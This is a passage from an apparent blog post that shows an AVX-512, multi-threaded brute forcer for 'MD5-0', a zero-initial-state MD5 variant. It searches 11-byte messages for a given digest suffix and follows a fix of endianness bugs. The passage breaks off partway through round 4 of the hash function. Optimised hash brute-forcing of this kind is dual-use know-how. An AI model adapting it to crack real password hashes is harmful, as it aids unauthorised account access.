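uint32_t load_le32(const uint8_t *p) {
    assert(p != NULL);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Reads the same 4 bytes in big-endian order, i.e. the flipped interpretation. */
uint32_t load_be32(const uint8_t *p) {
    assert(p != NULL);
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | (uint32_t)p[3];
}

/* The target suffix 19c603ba14353ce4 written out as raw digest bytes. */
const uint8_t TARGET_SUFFIX[8] = { 0x19, 0xc6, 0x03, 0xba, 0x14, 0x35, 0x3c, 0xe4 };
```

<p>Reading the two halves with <code class="language-plaintext highlighter-rouge">load_le32</code> gives <code class="language-plaintext highlighter-rouge">0xba03c619</code> and <code class="language-plaintext highlighter-rouge">0xe43c3514</code>, which are the <code class="language-plaintext highlighter-rouge">T0</code> and <code class="language-plaintext highlighter-rouge">T1</code> constants in the fixed program, whereas <code class="language-plaintext highlighter-rouge">load_be32</code> gives <code class="language-plaintext highlighter-rouge">0x19c603ba</code> for the first half and can never match.</p>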

<p>After fixing these bugs, I was at last able to run the multi-threaded, AVX-512 optimized
<em>MD5-0</em> brute forcer without any issues:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// gcc -O3 -march=native -o brute brute.c &amp;&amp; ./brute</span>

<span class="cp">#include</span> <span class="cpf">&lt;immintrin.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;pthread.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span>
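<span class="c1">// Truth tables for _mm512_ternarylogic_epi32 that implement the MD5 round functions F, G, H and I</span>
<span class="cp">#define AVX512_F 0xca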
#define AVX512_G 0xe4
#define AVX512_H 0x96
#define AVX512_I 0x39
</span>
<span class="cp">#define AVX512_STEP(f, a, b, c, d, r, k) { \
    (a) = _mm512_add_epi32((a), _mm512_add_epi32(_mm512_ternarylogic_epi32((b), (c), (d), (f)), (k))); \
    (a) = _mm512_add_epi32(_mm512_rol_epi32((a), (r)), (b)); \
}
</span>
<span class="cp">#define T0 0xba03c619
#define T1 0xe43c3514
</span>
<span class="k">static</span> <span class="kt">uint32_t</span> <span class="nf">md5_avx512</span><span class="p">(</span><span class="n">__m512i</span> <span class="n">x0</span><span class="p">,</span> <span class="n">__m512i</span> <span class="n">x1</span><span class="p">,</span> <span class="n">__m512i</span> <span class="n">x2</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">__m512i</span> <span class="n">a</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>
    <span class="n">__m512i</span> <span class="n">b</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>
    <span class="n">__m512i</span> <span class="n">c</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>
    <span class="n">__m512i</span> <span class="n">d</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>

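    <span class="c1">// For an 11-byte message, words 3..13 and 15 of the padded block are zero, and word 14 is</span>
    <span class="c1">// the bit length 88 (0x58), which is already added into the constants of its four steps.</span>
    <span class="c1">// Round 1</span>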
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd76aa478</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe8c7b756</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x242070db</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc1bdceee</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf57c0faf</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x4787c62a</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa8304613</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfd469501</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x698098d8</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8b44f7af</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xffff5bb1</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x895cd7be</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x6b901122</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfd987193</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa67943e6</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x49b40821</span><span class="p">));</span>

    <span class="c1">// Round 2</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf61e2562</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc040b340</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x265e5a51</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe9b6c7aa</span><span class="p">)));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd62f105d</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x02441453</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd8a1e681</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe7d3fbc8</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x21e1cde6</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc337082e</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf4d50d87</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x455a14ed</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa9e3e905</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfcefa3f8</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x676f02d9</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8d2a4c8a</span><span class="p">));</span>

    <span class="c1">// Round 3</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfffa3942</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8771f681</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x6d9d6122</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfde53864</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa4beea44</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x4bdecfa9</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf6bb4b60</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xbebfbc70</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x289b7ec6</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xeaa127fa</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd4ef3085</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x04881d05</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd9d4d039</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe6db99e5</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x1fa27cf8</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc4ac5665</span><span class="p">)));</span>

    <span class="c1">// Round 4</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf4292244</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x432aff97</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xab9423ff</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfc93a039</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x655b59c3</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8f0ccc92</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xffeff47d</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x85845dd1</span><span class="p">)));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x6fa87e4f</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfe2ce6e0</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa3014314</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x4e0811a1</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf7537e82</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xbd3af235</span><span class="p">));</span>
